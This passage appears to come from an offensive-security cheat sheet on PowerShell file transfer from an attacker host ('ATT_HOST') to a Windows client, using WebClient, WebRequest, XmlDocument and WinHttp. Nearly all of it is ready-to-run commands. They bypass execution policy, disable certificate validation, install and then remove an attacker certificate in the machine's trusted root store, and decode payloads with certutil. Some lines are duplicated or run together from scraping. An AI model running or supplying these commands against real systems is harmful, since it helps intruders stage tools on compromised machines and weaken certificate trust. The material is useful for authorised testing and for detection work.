$tmp="${RFILE}.b64"; $res=(New-Object -TypeName System.Net.WebClient).DownloadString("https://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp");
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
6. [CLIENT] wait for file to finish downloading
7. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$res,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
8. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force;
https://learn.microsoft.com/en-us/dotnet/api/system.net.webrequest
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- .NET class
- using base64 encoding to avoid various complications with file transfer (not further analyzed)
- target web server must host base64-encoded version of target file (with
.b64appended to filename)
- target web server must host base64-encoded version of target file (with
- using
certutil.exeover PowerShell for base64 decoding to avoid performance issues with decoding (larger files)- for a pure PowerShell solution replace the
certutil.execommand with[System.Convert]::FromBase64String((Get-Content $tmp)) | Set-Content -Encoding Byte $RFILE;
- for a pure PowerShell solution replace the
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
1. [SERVER] base64-encode target file
export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;
2. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
NOTE: specify target file (i.e. not base64-encoded target file)
4. [CLIENT] download file
$tmp="${RFILE}.b64"; $res=([System.IO.StreamReader]::new([System.Net.WebRequest]::Create("http://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp").GetResponse().GetResponseStream()).ReadToEnd());
NOTE: if using HTTPS, replace http with https
5. [CLIENT] wait for file to finish downloading
6. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$res,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
2. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
3. [CLIENT] disable X.509 certificate validation
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; [System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
4. [CLIENT] download file
$tmp="${RFILE}.b64"; $res=([System.IO.StreamReader]::new([System.Net.WebRequest]::Create("https://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp").GetResponse().GetResponseStream()).ReadToEnd());
5. [CLIENT] wait for file to finish downloading
6. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$res,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [SERVER] base64-encode target file
export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;
2. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
NOTE: specify target file (i.e. not base64-encoded target file)
4. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
5. [CLIENT] download file
$tmp="${RFILE}.b64"; $res=([System.IO.StreamReader]::new([System.Net.WebRequest]::Create("https://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp").GetResponse().GetResponseStream()).ReadToEnd());
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
6. [CLIENT] wait for file to finish downloading
7. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$res,$noBOM); certutil.exe -decode $tmp $RFILE > $nul;Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
8. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force;
https://learn.microsoft.com/en-us/dotnet/api/system.xml.xmldocument
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- .NET class
- using base64 encoding to avoid various complications with file transfer (not further analyzed)
- target web server must host base64-encoded version of target file (with
.b64appended to filename)
- target web server must host base64-encoded version of target file (with
- using
certutil.exeover PowerShell for base64 decoding to avoid performance issues with decoding (larger files)- for a pure PowerShell solution replace the
certutil.execommand with[System.Convert]::FromBase64String((Get-Content $tmp)) | Set-Content -Encoding Byte $RFILE;
- for a pure PowerShell solution replace the
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
1. [SERVER] base64-encode target file and save to XML file
export LFILE="testfile_200MB";
echo -e "<?xml version=\"1.0\"?>\n<b64>$(cat $LFILE | base64 -w0)</b64>" > dl.xml;
2. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
4. [CLIENT] download file
$tmp="${RFILE}.b64"; $res=(New-Object -TypeName System.Xml.XmlDocument); $res.Load("http://${ATT_HOST}:$ATT_PORT${ATT_PATH}dl.xml");
NOTE: if using HTTPS, replace http with https
5. [CLIENT] wait for file to finish downloading
6. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$res.b64,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [SERVER] base64-encode target file and save to XML file
export LFILE="testfile_200MB";
echo -e "<?xml version=\"1.0\"?>\n<b64>$(cat $LFILE | base64 -w0)</b64>" > dl.xml;
2. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
4. [CLIENT] disable X.509 certificate validation
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; [System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
5. [CLIENT] download file
$tmp="${RFILE}.b64"; $res=(New-Object -TypeName System.Xml.XmlDocument); $res.Load("https://${ATT_HOST}:$ATT_PORT${ATT_PATH}dl.xml");
6. [CLIENT] wait for file to finish downloading
7. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$res.b64,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [SERVER] base64-encode target file and save to XML file
export LFILE="testfile_200MB";
echo -e "<?xml version=\"1.0\"?>\n<b64>$(cat $LFILE | base64 -w0)</b64>" > dl.xml;
2. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
4. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
5. [CLIENT] download file
$tmp="${RFILE}.b64"; $res=(New-Object -TypeName System.Xml.XmlDocument); $res.Load("https://${ATT_HOST}:$ATT_PORT${ATT_PATH}dl.xml");
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
6. [CLIENT] wait for file to finish downloading
7. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$res.b64,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
8. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force;
https://learn.microsoft.com/en-us/windows/win32/winhttp/winhttprequest
https://learn.microsoft.com/en-us/windows/win32/winhttp/about-winhttp
TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)
NOTES:
- COM object
- utilises WinHTTP
- using base64 encoding to avoid various complications with file transfer (not further analyzed)
- target web server must host base64-encoded version of target file (with
.b64appended to filename)
- target web server must host base64-encoded version of target file (with
- using
certutil.exeover PowerShell for base64 decoding to avoid performance issues with decoding (larger files)- for a pure PowerShell solution replace the
certutil.execommand with[System.Convert]::FromBase64String((Get-Content $tmp)) | Set-Content -Encoding Byte $RFILE;
- for a pure PowerShell solution replace the
- HTTPS working with self-signed X.509 certificate
- install certificate in certificate store, under Current User ➔ Trusted Root Certification Authorities
- its
Common Namefield must contain, either:- DNS resolvable hostname
- IP address of web server
1. [SERVER] base64-encode target file
export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;
2. [CLIENT] open PowerShell session
(open command prompt)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="80";
$ATT_PATH="/";
$RFILE="testfile_200MB";
NOTE: specify target file (i.e. not base64-encoded target file)
4. [CLIENT] download file
$tmp="${RFILE}.b64"; $dl=(New-Object -ComObject WinHttp.WinHttpRequest.5.1); $dl.open("GET","http://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp",$false); $dl.send();
NOTE: if using HTTPS, replace http with https
5. [CLIENT] wait for file to finish downloading
6. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$dl.responseText,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
1. [SERVER] base64-encode target file
export LFILE="testfile_200MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;
2. [CLIENT] open PowerShell session
(open command prompt with local administrative privileges)
powershell.exe -ep bypass -nop
3. [CLIENT] specify file transfer parameters
$ATT_HOST="192.168.5.11";
$ATT_PORT="443";
$ATT_PATH="/";
$RFILE="testfile_200MB";
NOTE: specify target file (i.e. not base64-encoded target file)
4. [CLIENT] download self-signed X.509 certificate and add it to local certificate store
[System.Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; $webRequest=[Net.WebRequest]::Create("https://$ATT_HOST`:$ATT_PORT/"); try {$webRequest.GetResponse()} catch {}; $cert=$webRequest.ServicePoint.Certificate; $ATT_HOSTNAME=($cert.Issuer.Split(',')[0]).Substring(3); $certBytes=$cert.Export([Security.Cryptography.X509Certificates.X509ContentType]::Cert); $oPem=(New-Object System.Text.StringBuilder); $oPem.AppendLine("-----BEGIN CERTIFICATE-----") > $null; $oPem.AppendLine([System.Convert]::ToBase64String($certBytes,1)) > $null; $oPem.AppendLine("-----END CERTIFICATE-----") > $null; $oPem.ToString() | Out-File $pwd\cert.pem; Import-Certificate -FilePath "$pwd\cert.pem" -CertStoreLocation "Cert:\LocalMachine\Root" > $null; Remove-Item -Force $pwd\cert.pem;
5. [CLIENT] download file
$tmp="${RFILE}.b64"; $dl=(New-Object -ComObject WinHttp.WinHttpRequest.5.1); $dl.open("GET","https://${ATT_HOST}:$ATT_PORT$ATT_PATH$tmp",$false); $dl.send();
NOTE: the X.509 certificate's Common Name field must contain, either:
- DNS resolvable hostname
- IP address of web server
6. [CLIENT] wait for file to finish downloading
7. [CLIENT] base64-decode file
$noBOM=(New-Object -TypeName System.Text.UTF8Encoding $False); [System.IO.File]::WriteAllLines($tmp,$dl.responseText,$noBOM); certutil.exe -decode $tmp $RFILE > $nul; Remove-Item -Force $pwd\$tmp; (Get-FileHash $RFILE -Algorithm MD5).Hash;
8. [CLIENT] remove self-signed X.509 certificate from local certificate store
Get-ChildItem -Path "Cert:\LocalMachine\Root" | Where-Object {$_.Subject -match $ATT_HOSTNAME} | Remove-Item -Force